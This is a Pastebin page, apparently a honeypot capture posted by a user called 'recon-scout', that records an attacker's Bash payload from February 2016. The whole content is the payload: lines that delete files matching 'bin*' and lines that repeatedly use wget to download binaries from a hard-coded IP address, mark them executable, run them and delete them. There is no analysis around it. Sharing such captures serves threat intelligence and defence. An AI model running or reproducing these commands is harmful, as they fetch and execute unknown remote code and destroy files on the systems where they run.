recon-scout

Honeypot Payload! Seen on: 2016-02-18 14:11

Feb 18th, 2016
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.29 KB | None | 0 0
  1. rm -rf bin*
  2. wget -q http://89.248.162.146/500; chmod +x 500; ./500; rm -f 500*
  3. wget -q http://89.248.162.146/600; chmod +x 600; ./600; rm -f 600*
  4. wget -q http://89.248.162.146/700; chmod +x 700; ./700; rm -f 700*
  5. wget -q http://89.248.162.146/800; chmod +x 800; ./800; rm -f 800*
  6. rm -rf bin*
  7. exit
Add Comment
Please, Sign In to add comment